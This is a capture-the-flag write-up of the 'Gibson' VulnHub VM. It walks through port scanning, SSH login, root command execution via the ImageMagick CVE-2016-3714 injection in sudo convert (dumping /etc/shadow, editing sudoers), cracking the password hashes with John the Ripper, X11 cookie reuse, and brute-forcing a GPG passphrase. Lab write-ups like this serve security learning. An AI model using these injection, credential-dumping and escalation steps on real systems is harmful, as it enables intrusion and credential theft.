I decided to get started in the world of CTF writeups with this VM made by Knightmare! The description promised some unexpected twists, but at the same time it didn’t seem to be heavy on reversing and/or binary exploitation, so I felt it was a good place to start. Without further ado, let’s begin!
The starting point is always finding out which services are running on the open ports, so let’s do that.
root@kali:~# nmap -A -p1-65535 192.168.56.102 Starting Nmap 7.01 ( https://nmap.org ) at 2016-05-17 18:14 CEST Nmap scan report for 192.168.56.102 Host is up (0.00022s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 fb:f6:d1:57:64:fa:38:66:2d:66:40:12:a4:2f:75:b4 (DSA) | 2048 32:13:58:ae:32:b0:5d:b9:2a:9c:87:9c:ae:79:3b:2e (RSA) |_ 256 3f:dc:7d:94:2f:86:f1:83:41:db:8c:74:52:f0:49:43 (ECDSA) 80/tcp open http Apache httpd 2.4.7 | http-ls: Volume / | SIZE TIME FILENAME | 273 2016-05-07 13:03 davinci.html |_ |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: Index of / MAC Address: 08:00:27:AF:47:CA (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.0 Network Distance: 1 hop Service Info: Host: gibson.example.co.uk; OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.22 ms 192.168.56.102 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 23.83 seconds
Of course I was not going to be able to straightforward SSH in, so I’d better check what’s in the web server.
I opened Iceweasel and navigated to port 80. There was a single file listed:
<!-- Damn it Margo! Stop setting your password to "god" --> <!-- at least try and use a different one of the 4 most --> <!-- common ones! (eugene) --> <h1> The answer you seek will be found by brute force</h1>
This seemed a pretty clear hint to the SSH credentials. I tried the ssh users
but neither was asked for a password (only publickey). I thought in being explicit, just in case:
ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no 192.168.56.102
But no luck, the password login was disabled.
…Then I noticed I had tried
margo, and guess what?
ssh firstname.lastname@example.org #god
sudo su didn’t work (it would have been too easy, right?) but I was luckier with
sudo -l. It seemed that
margo could run
/usr/bin/convert as root. The binary was part of the ImageMagick tool… which reminded of CVE-2016-3714.
After some research, I managed to run commands as root exploiting said vulnerability. The fastest way to get root with this was to edit the sudoers file, but before that I played around a little.
margo@gibson:~$ sudo convert 'https://example.com"|cat "/etc/shadow' out.png root:!:16921:0:99999:7::: daemon:*:16652:0:99999:7::: bin:*:16652:0:99999:7::: sys:*:16652:0:99999:7::: sync:*:16652:0:99999:7::: games:*:16652:0:99999:7::: man:*:16652:0:99999:7::: lp:*:16652:0:99999:7::: mail:*:16652:0:99999:7::: news:*:16652:0:99999:7::: uucp:*:16652:0:99999:7::: proxy:*:16652:0:99999:7::: www-data:*:16652:0:99999:7::: backup:*:16652:0:99999:7::: list:*:16652:0:99999:7::: irc:*:16652:0:99999:7::: gnats:*:16652:0:99999:7::: nobody:*:16652:0:99999:7::: libuuid:!:16652:0:99999:7::: syslog:*:16652:0:99999:7::: messagebus:*:16921:0:99999:7::: dnsmasq:*:16921:0:99999:7::: landscape:*:16921:0:99999:7::: sshd:*:16921:0:99999:7::: libvirt-qemu:!:16921:0:99999:7::: libvirt-dnsmasq:!:16921:0:99999:7::: duke:$6$xRLSRx7x$O.REaRUKj6zM.ZAYFBfZEfq.iyoiHKlpNCFlh9D8gQBfRdldL05vAxHmjuTgriKCetSADyWyLKvklZhcQp7mu1:16928:0:99999:7::: colord:*:16922:0:99999:7::: eugene:$6$UU15rhob$qZ5B2VjeCk9QIlxXS6QDf9MuxFpNkfAQTc3V3ny.57kLHLj1aOdLnmprfL53niAfztzGMLJqSZaS79sYY1X1a/:16928:0:99999:7::: margo:$6$Nx0eYFUO$f99BzOSc/hBLbflCsV5912gdcNNUKRi/xGTz7xldbr402BQ367eN.GsCScejNNotaJg9oQPhqdzqq/DcHCKYD/:16928:0:99999:7::: convert.im6: unable to open image `/tmp/magick-rCN9wlXv': No such file or directory @ error/blob.c/OpenBlob/2638. convert.im6: unable to open file `/tmp/magick-rCN9wlXv': No such file or directory @ error/constitute.c/ReadImage/583. convert.im6: no images defined `out.png' @ error/convert.c/ConvertImageCommand/3044.
I cracked the hashes for
eugene with John the Ripper, which was surprisingly fast.
root@kali:~/gibson# john hashes.txt Created directory: /root/.john Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt" Use the "--format=crypt" option to force loading these as that type instead Using default input encoding: UTF-8 Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x]) Press 'q' or Ctrl-C to abort, almost any other key for status 0g 0:00:00:07 75.42% 1/3 (ETA: 18:47:31) 0g/s 811.3p/s 811.3c/s 811.3C/s 9999955..d9999957 secret (eugene) love (duke) god (margo) 3g 0:00:00:16 DONE 2/3 (2016-05-17 18:47) 0.1806g/s 729.3p/s 740.8c/s 740.8C/s fiction..jethrotull Use the "--show" option to display all of the cracked passwords reliably Session completed
duke seemed a pretty normal user, but
eugene was good news. From the sudoers file I found out that
eugene could execute another command as root:
eugene ALL=(ALL) NOPASSWD: /usr/bin/virt-manager
Which I honestly had no idea what it was. After some googling, I learned that
virt-manager is a VM manager! Then I remembered the hints given at the description of the challenge:
- It doesn’t matter what your local subnet is, as long as you keep away from the 192.168.122.0/24 subnet.
- SSH can forward X11.
- The challenge isn’t over with root. The flag is not where you expect to find it.
The network part was interesting.
eugene@gibson::~$ ifconfig eth0 Link encap:Ethernet HWaddr 08:00:27:af:47:ca inet addr:192.168.56.102 Bcast:192.168.56.255 Mask:255.255.255.0 inet6 addr: fe80::a00:27ff:feaf:47ca/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:143078 errors:0 dropped:0 overruns:0 frame:0 TX packets:140857 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:9389412 (9.3 MB) TX bytes:11069499 (11.0 MB) lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:752 errors:0 dropped:0 overruns:0 frame:0 TX packets:752 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:54416 (54.4 KB) TX bytes:54416 (54.4 KB) virbr0 Link encap:Ethernet HWaddr fe:54:00:72:e2:fb inet addr:192.168.122.1 Bcast:192.168.122.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:6 errors:0 dropped:0 overruns:0 frame:0 TX packets:15 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:1271 (1.2 KB) TX bytes:1889 (1.8 KB) vnet0 Link encap:Ethernet HWaddr fe:54:00:72:e2:fb inet6 addr: fe80::fc54:ff:fe72:e2fb/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:6 errors:0 dropped:0 overruns:0 frame:0 TX packets:1665 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:500 RX bytes:1355 (1.3 KB) TX bytes:87921 (87.9 KB)
Wow, so there was actually another active interface:
virbr0. Could it be that, inside the VM, there was ANOTHER VM?
The thing was that I couldn’t SSH as
eugene directly, because of the no-password restriction. I could’ve added a public key to his home directory or disabled the restriction, but rather I just
su‘d into him.
…Which was a pain, because when running
sudo virt-manager it complained about the X11 authentication failing. Of course, I didn’t have an
xauth cookie for
eugene. So I copied it from
root@kali:~/gibson# ssh -X email@example.com Ubuntu 14.04.3 LTS firstname.lastname@example.org's password: #god margo@gibson:~$ xauth list gibson/unix:10 MIT-MAGIC-COOKIE-1 01dccb5a0820e7f65c5211528c49c0eb margo@gibson:~$ su eugene Password: #secret eugene@gibson:/home/margo$ xauth add gibson/unix:10 MIT-MAGIC-COOKIE-1 01dccb5a0820e7f65c5211528c49c0eb eugene@gibson:/home/margo$ sudo /usr/bin/virt-manager
Holy f*ck, I got in.
Of course, I could’ve always modified the
/etc/sudoers file and get root directly:
sudo convert 'https://example.com"|vi "/etc/sudoers' out.png
Change the following line:
margo ALL=(ALL) NOPASSWD: ALL#/usr/bin/convert
margo@gibson:~$ sudo su root@gibson:/home/margo#
The virt-manager GUI appeared, and only one machine named “ftpserv” existed. I opened a shell by double-clicking it and discovered that it was running a FreeDOS :-O Had to Google quite a bit at this point…
Once I thought I could continue, I started by exploring the directories. After a
dir I found this directory named GARBAGE which catched my attention.
cd garbage dir ADMINSPO.JPG FLAG.IMG JZ_UG.ANS
The FLAG.IMG seemed interesting, but I had to find a way to take it outside the box.
I decided to go big and copied the full VM disk image to my Kali box. I’m subtle as that :)
At this point, the root permissions became a need, so I modified the sudoers file as explained before.
margo@gibson:~$ sudo su root@gibson:/home/margo# cp /var/lib/libvirt/images/ftpserv.img /tmp/ root@gibson:/home/margo# chown margo /tmp/ftpserv.img
And then I was able to get it from my Kali:
root@kali:~# scp email@example.com:/tmp/ftpserv.img gibson
Getting the flag
I mounted the image (fun name, KFLYNN, Kevin Flynn from Tron!) and went to
There I ran
exiftool to peek on the metadata of the JPG file:
root@kali:/media/root/KFYLNN/GARBAGE# exiftool adminspo.jpg ExifTool Version Number : 10.15 File Name : adminspo.jpg Directory : . File Size : 120 kB File Modification Date/Time : 2016:05:04 23:17:44+02:00 File Access Date/Time : 1980:01:01 01:00:00+01:00 File Inode Change Date/Time : 2016:05:04 23:31:08+02:00 File Permissions : rw-r--r-- File Type : JPEG File Type Extension : jpg MIME Type : image/jpeg Exif Byte Order : Big-endian (Motorola, MM) Image Description : Rabbit.. Flu Shot... TYPE COOKE YOU IDIOT! I'll head them off at the pass Modify Date : 2016:05:04 22:29:32 Artist : Virtualization is fun.. What's more, esoteric OSes on 192.168.122 are even more fun User Comment : So there's info here.... Images, hmm... Wasn't that a CVE...? Oh yes... CVE 2016-3714....http://www.openwall.com/lists/oss-security/2016/05/03/18 so which person can run it. Perhaps the man who knew a lot about Sean Connery in Trainspotting when he wasn't causing a 7 point drop in the NYSE JFIF Version : 1.01 Resolution Unit : None X Resolution : 1 Y Resolution : 1 Image Width : 800 Image Height : 800 Encoding Process : Baseline DCT, Huffman coding Bits Per Sample : 8 Color Components : 3 Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2) Image Size : 800x800 Megapixels : 0.640
Fun, but not useful anymore :)
So it was time to mount
There were three files, an executable program, its source code in C, and a hint.txt file.
root@kali:/media/root/d59bdd40-ec37-4d24-a956-80f549846121# cat hint.txt http://www.imdb.com/title/tt0117951/ and http://www.imdb.com/title/tt0113243/ have someone in common... Can you remember his original nom de plume in 1988...?
So it turns out Trainspotting and Hackers have the actor Jonny Lee Miller in common. I had to search what “nom de plume” meant (lol), but I quickly learnt it translates to “nickname”. I guess I should’ve known that already but… Whatever, Miller’s nickname in Hackers (which takes place in 1988) is “Zero Cool/Crash Override”. But what do I do with that?
I have to say I spent quite too much time trying to break the game in order to get something interesting. Modified the
highscores.txt file trying to make it crash, entered ZeroCool and CrashOverride as users just in case, played around with the snake (fun game btw), but eventually…
root@kali:/media/root/d59bdd40-ec37-4d24-a956-80f549846121# ls -la total 70 drwxr-xr-x 4 root root 1024 May 14 15:07 . drwxr-x---+ 4 root root 4096 May 21 09:40 .. -rwxrwxr-x 1 root root 21358 Nov 16 2011 davinci -rw-r--r-- 1 root root 28030 Nov 16 2011 davinci.c -rw-r--r-- 1 root root 159 May 5 20:56 hint.txt drwx------ 2 root root 12288 May 5 20:39 lost+found drwxr-xr-x 2 root root 1024 May 5 21:07 .trash
Yeah, maybe I should have started by doing that.
root@kali:/media/root/d59bdd40-ec37-4d24-a956-80f549846121# cd .trash/ root@kali:/media/root/d59bdd40-ec37-4d24-a956-80f549846121/.trash# ls -la total 319 drwxr-xr-x 2 root root 1024 May 5 21:07 . drwxr-xr-x 4 root root 1024 May 14 15:07 .. ---x------ 1 root root 469 May 14 15:18 flag.txt.gpg -rw-r--r-- 1 root root 320130 Sep 7 2015 LeithCentralStation.jpg
So now I need the passpharse to decrypt the flag! Could it be that the
hint.txt was referring to this?
gpg command with
crashoverride as passphrases to no avail. I ran
exiftool on the jpg file, but there was nothing interesting.
So I decided to go full bruteforce and generated some wordlists with cupp’s interactive mode.
root@kali:~/gibson# ~/cupp.py -i ... root@kali:~/gibson# for i in $(cat ~/cupp/zero.txt); do gpg --passphrase $i flag.txt.gpg; if [ -a "flag.txt" ]; then echo "Passphrase found! $i"; break; fi; done
After some tries and combinations, what finally made the trick was including the word ‘ZeroKool’ AND activating the tool’s l33t mode.
... gpg: CAST5 encrypted data gpg: encrypted with 1 passphrase gpg: WARNING: message was not integrity protected Passphrase found! Z3r0K00l root@kali:~/gibson# cat flag.txt _ _ _ _____ _ ____ _ _ _ | | | | __ _ ___| | __ |_ _| |__ ___ | _ \| | __ _ _ __ ___| |_| | | |_| |/ _` |/ __| |/ / | | | '_ \ / _ \ | |_) | |/ _` | '_ \ / _ \ __| | | _ | (_| | (__| < | | | | | | __/ | __/| | (_| | | | | __/ |_|_| |_| |_|\__,_|\___|_|\_\ |_| |_| |_|\___| |_| |_|\__,_|_| |_|\___|\__(_) Should you not be standing in a 360 degree rotating payphone when reading this flag...? B-) Anyhow, congratulations once more on rooting this VM. This time things were a bit esoteric, but I hope you enjoyed it all the same. Shout-outs again to #vulnhub for hosting a great learning tool. A special thanks goes to g0blin and GKNSB for testing, and to g0tM1lk for the offer to host the CTF once more. --Knightmare
Phew! For my first CTF writeup, this one surely got me confused for a while and made me take my time! I’m sure this could have been done better/faster, but nonetheless I managed to complete it. Big thanks to Knightmare for the fun challenege, I really enjoyed the movie references and learned quite a few new things (special mention to the whole FreeDOS thing!)